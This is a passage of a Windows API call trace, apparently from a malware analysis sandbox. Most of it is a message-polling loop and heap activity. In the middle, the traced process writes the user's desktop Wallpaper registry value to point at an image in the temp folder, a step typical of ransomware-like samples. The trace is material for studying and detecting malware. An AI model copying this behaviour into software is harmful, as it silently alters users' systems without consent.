| out: lpMsg=0x8bf7a0) returned 0 [0313.724] Sleep (dwMilliseconds=0xa) [0313.732] timeGetTime () returned 0x4e500 [0313.732] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0313.732] Sleep (dwMilliseconds=0xa) [0313.748] timeGetTime () returned 0x4e50f [0313.748] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0313.748] Sleep (dwMilliseconds=0xa) [0313.763] timeGetTime () returned 0x4e51f [0313.763] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0313.763] Sleep (dwMilliseconds=0xa) [0313.781] timeGetTime () returned 0x4e52f [0313.781] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0313.781] Sleep (dwMilliseconds=0xa) [0313.794] timeGetTime () returned 0x4e53e [0313.795] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 1 [0313.795] TranslateMessage (lpMsg=0x8bf7a0) returned 0 [0313.795] DispatchMessageW (lpMsg=0x8bf7a0) returned 0x0 [0313.795] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0313.795] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0313.795] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0313.795] Sleep (dwMilliseconds=0xa) [0313.810] timeGetTime () returned 0x4e54e [0313.810] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0313.810] Sleep (dwMilliseconds=0xa) [0313.826] timeGetTime () returned 0x4e55d [0313.826] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0313.826] Sleep (dwMilliseconds=0xa) [0313.850] timeGetTime () returned 0x4e56d [0313.850] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0313.850] Sleep (dwMilliseconds=0xa) [0313.857] timeGetTime () returned 0x4e57d [0313.857] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0313.857] Sleep (dwMilliseconds=0xa) [0313.872] timeGetTime () returned 0x4e58c [0313.872] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0313.872] Sleep (dwMilliseconds=0xa) [0313.888] timeGetTime () returned 0x4e59c [0313.888] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0313.888] Sleep (dwMilliseconds=0xa) [0313.903] timeGetTime () returned 0x4e5ab [0313.904] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0313.904] Sleep (dwMilliseconds=0xa) [0313.919] timeGetTime () returned 0x4e5bb [0313.919] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0313.919] Sleep (dwMilliseconds=0xa) [0313.935] timeGetTime () returned 0x4e5cb [0313.935] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0313.935] Sleep (dwMilliseconds=0xa) [0313.950] timeGetTime () returned 0x4e5da [0313.950] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0313.950] Sleep (dwMilliseconds=0xa) [0313.970] timeGetTime () returned 0x4e5ea [0313.970] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0313.970] Sleep (dwMilliseconds=0xa) [0313.982] timeGetTime () returned 0x4e5f9 [0313.982] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0313.982] Sleep (dwMilliseconds=0xa) [0313.997] timeGetTime () returned 0x4e609 [0313.997] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0313.997] Sleep (dwMilliseconds=0xa) [0314.013] timeGetTime () returned 0x4e619 [0314.013] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0314.013] Sleep (dwMilliseconds=0xa) [0314.028] timeGetTime () returned 0x4e628 [0314.028] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0314.028] Sleep (dwMilliseconds=0xa) [0314.044] timeGetTime () returned 0x4e638 [0314.044] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0314.044] Sleep (dwMilliseconds=0xa) [0314.060] timeGetTime () returned 0x4e647 [0314.060] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0314.060] Sleep (dwMilliseconds=0xa) [0314.075] timeGetTime () returned 0x4e657 [0314.075] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0314.076] Sleep (dwMilliseconds=0xa) [0314.091] timeGetTime () returned 0x4e667 [0314.091] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0314.091] Sleep (dwMilliseconds=0xa) [0314.106] timeGetTime () returned 0x4e676 [0314.106] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0314.106] Sleep (dwMilliseconds=0xa) [0314.122] timeGetTime () returned 0x4e686 [0314.122] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0314.122] Sleep (dwMilliseconds=0xa) [0314.138] timeGetTime () returned 0x4e695 [0314.138] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0314.138] Sleep (dwMilliseconds=0xa) [0314.153] timeGetTime () returned 0x4e6a5 [0314.153] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0314.154] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0314.154] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0314.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0314.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0314.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0314.154] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0314.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0314.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0314.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0314.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0314.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0314.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0314.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0314.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0314.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0314.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0314.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0314.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0314.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0314.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0314.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0314.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0314.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0314.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0314.158] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0314.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa880 [0314.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0314.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5f8 [0314.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0314.158] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0314.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa880 [0314.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0314.158] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf440 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0314.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0314.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0314.159] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0314.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0314.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0314.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0314.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0314.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0314.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0314.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0314.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0314.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0314.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0314.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0314.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0314.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0314.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x24207f0 [0314.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0314.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0314.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0314.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0314.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0314.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0314.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0314.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0314.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0314.160] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0314.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0314.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0314.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0314.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0314.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b35e0 [0314.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0314.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0314.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0314.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0314.161] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0314.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0314.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0314.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0314.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0314.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0314.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0314.162] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8bf858, lpdwDisposition=0x8bf874 | out: phkResult=0x8bf858*=0x294, lpdwDisposition=0x8bf874*=0x2) returned 0x0 [0314.162] RegSetValueExW (in: hKey=0x294, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\wl.jpg", cbData=0x58 | out: lpData="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0314.162] RegCloseKey (hKey=0x294) returned 0x0 [0314.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b35e0 | out: hHeap=0x25c0000) returned 1 [0314.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0314.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0314.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0314.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0314.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0314.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0314.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0314.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0314.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0314.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0314.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0314.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0314.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0314.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0314.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0314.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0314.164] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0314.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0314.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0314.164] CharUpperBuffW (in: lpsz="A4200F01243", cchLength=0xb | out: lpsz="A4200F01243") returned 0xb [0314.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0314.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0314.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0314.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1708 [0314.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0314.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0314.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0314.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0314.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2058 [0314.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0314.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0314.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0314.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0314.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0314.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0314.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0314.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0314.165] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0314.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0314.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0314.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4f0 [0314.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0314.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0314.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0314.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0314.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0314.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0314.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0314.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0314.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0314.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0314.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0314.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0314.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0314.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa508 [0314.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa850 [0314.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0314.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0314.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0314.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0314.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0314.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0314.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0314.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0314.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0314.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0314.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0314.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0314.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa850 [0314.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa508 [0314.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0314.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0314.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0314.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0314.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0314.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0314.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0314.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0314.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0314.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0314.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0314.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0314.170] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0314.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0314.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0314.170] RtlAllocateHeap (HeapHandle=0x25c0000, 